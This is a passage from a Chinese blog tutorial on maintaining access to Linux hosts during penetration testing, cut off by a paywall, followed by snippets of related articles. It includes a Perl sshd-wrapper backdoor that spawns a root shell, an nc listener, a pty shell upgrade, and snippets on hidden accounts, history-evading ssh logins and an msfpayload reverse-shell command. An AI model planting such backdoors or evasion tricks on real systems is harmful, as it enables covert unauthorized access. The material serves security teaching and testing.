内网渗透-Linux权限维持

已于 2023-01-20 00:44:42 修改
阅读量2.3k 收藏 3
点赞数 1
分类专栏: 内网渗透 文章标签: 安全性测试 web安全 安全
于 2022-09-26 22:08:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/127060704
版权

Linux权限维持

文章目录

前言

前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。

ssh后门

过滤
ps -elf |grep 12345

监听端口
nc -lvvp 123

查看端口
netstat -anlp|grep 12345

(1)ssh后门(脚本内容)(192.168.231.134)
#!/usr/bin/perl
exec “bin/sh” if (getpeername(STDIN) =~ /^…4A/);
exec {“/usr/bin/sshd”} “/usr/sbin/sshd”,@ARGV,

开启ssh服务,连接ssh(192.168.231.128)
ssh root@191.168.231.134 -p 12345(无需密码即可登录成功)
实验失败

获得shell后,利用python模块获取虚拟终端
python -c ‘import pty;pty.spawn(“/bin/bash”)’

查看登录的来源
w who last

ip addr 查看ip地址

本次实验,脚本没有执行成功,这里就不演示了。

Setuid and Setgid

(2)Set

了解本专栏 订阅专栏 解锁全文 超级会员免费看
炫彩@之星
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Linux权限维持
小丁长不胖
07-22 247
一:适配方法 1:后门账户 可疑用户排查: 2:SUID Shell Suid shell是一种可用于以拥有者权限运行的shell。 可疑排查: 3:公私钥免密登录 在客户端上生成一对公私钥,然后把公钥放到服务器上(~/.ssh/authorized_keys),保留私钥。当ssh登录时,ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。 客户端与服务端执行: ssh-keygen -t rsa #过程中按三次回车 其中 id_rsa为私钥,id_rsa.pub为公钥,接
Linux权限维持(六)
pingan233的博客
02-25 301
# “2”在linux中代表错误输出,“1”在linux中代表标准输出,在此处也就是nohup的输出。#mount --bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅是无法访问了)。一般来说我们是做一个正向连接后门,因为反向后门的代码里面没有循环,并不能进行长时间的连接。其中,恶意脚本 dir.py 的内容可以是任何功能的后门,比如上面的监听本地11端口。
渗透-windows权限维持的方法
最新发布
lza20001103的博客
04-14 1182
渗透-windows权限维持的方法
ssh不留痕迹登录
qq_45290991的博客
09-20 3831
一、远程登录ssh时候w和last无法发现 ssh -T root@127.0.0.1 /bin/bash -i ssh -lroot 目标ip /usr/bin/bash /usr/bin/bash -i 表示在登录之后 调用bash命令 -i 表示是交互式shell 原因:w和last,只能发现完整的tty交互式终端,而上述命令并不会分配一个真正的tty,仅仅是调用了/bin/bash而已(接受我们的输入然后输出) #不留下.bash_history unset HISTORY.
linux内渗透1
08-03
综上所述,此过程展示了Linux内渗透的基本步骤,包括漏洞利用、权限提升、信息收集、横向移动以及内资源的探测。同时也揭示了络安全的重要性,尤其是对敏感信息的保护和良好的系统管理实践。对于IT安全从业...
Linux内渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持、Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
渗透测试-提权工具
05-25
渗透测试是信息安全领域中的一个重要环节,主要目的是模拟黑客攻击行为,以发现并修复组织内部络中的安全漏洞。在这个过程中,提权是关键的一环,它指的是在获取了低权限账户后,尝试升级到管理员权限,从而...
EW内渗透
05-06
渗透络安全领域中的一个重要话题,特别是在企业络环境中,内安全的防护与渗透测试是保障业务连续性和数据安全的关键。"EW内渗透"可能是指一种内渗透工具或者一套方法论,用于模拟黑客攻击行为,检测...
安全攻防渗透测试实战指南.pptx
07-01
安全攻防渗透测试实战指南 ...内安全攻防渗透测试实战指南旨在帮助安全人员和渗透测试人员更好地理解内安全攻防的原理和方法,并提供了一些实用的技术和工具来帮助他们更好地进行内渗透测试和安全攻防。
络安全-渗透中的权限维持-杨晓成-360
02-01
络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
渗透之——权限维持(获取windows、linux密码,安装后门程序)
wsnbbz的博客
03-23 7416
介绍 当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了 目的 由于攻击可能被发现,被发现后可能会被将之前拿到的的webshell清除,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的 获取系统登陆账号密码 windows获取系统登陆账号密码 windows系统账号密码存储位置: C...
linux环境下常见漏洞利用技术,linux常见漏洞利用技术实践
weixin_39961943的博客
05-10 275
0x01 前言1.1 目的1.1.1 写这篇文章一是总结一下前段时间所学的东西,二是给pwn还没入门的同学一些帮助,毕竟自己学的时候还是遇到不少困难以下都是我的实际操作,写的比较详细,包含了我自己的一些经验,欢迎大家指点.1.1.2 内容包含利用跳板劫持流程,GOT覆写 ,ret2libc等技术1.2 预备1.2.1工具1.2.1.1 ida反汇编神器,下载地址down.52pojie.cn1.2...
渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4351
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右键—>权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
linux中的setUID权限
qq_40420795的博客
12-16 3039
  setUID命令只能对文件生效,对目录不生效 在使用umask命令查看系统默认权限时,会出现4位数字的权限代号,如下: 其中第一个0表示的其实就是文件的特殊权限,包括setUID,setGID,sticky BIT权限,其于文件的用户对应的关系为: 特殊权限名 对应用户 对应权限代号 setUID u(所有者) 4 setGID g(所属组) ...
MSF之meterpreter权限维持
梦想专栏
07-30 2058
00×01 首先,我们先来生成一个 meterpreter 类型的 PALOAD : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe 00×02 建立反弹处理 exploit : use exploit/mutil/handler set payload wi...
基于树莓派Kali Linux渗透测试基础教程,络安全,计算机,黑客教程
03-13
树莓派kali linux教程 树莓派,(英语:Raspberry Pi,简写为RPi,别名为RasPi / RPI) [1] 是为学习计算机编程教育而设计,只有信用卡大小的微型电脑,其系统基于Linux。随着Windows 10 IoT的发布,用户可以用上运行Windows的树莓派。 树莓派自问世以来,受众多计算机发烧友和创客的追捧,曾经一“派”难求。别看其外表“娇小”,内“芯”却很强大,视频、音频等功能通通皆有,可谓是“麻雀虽小,五脏俱全”。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值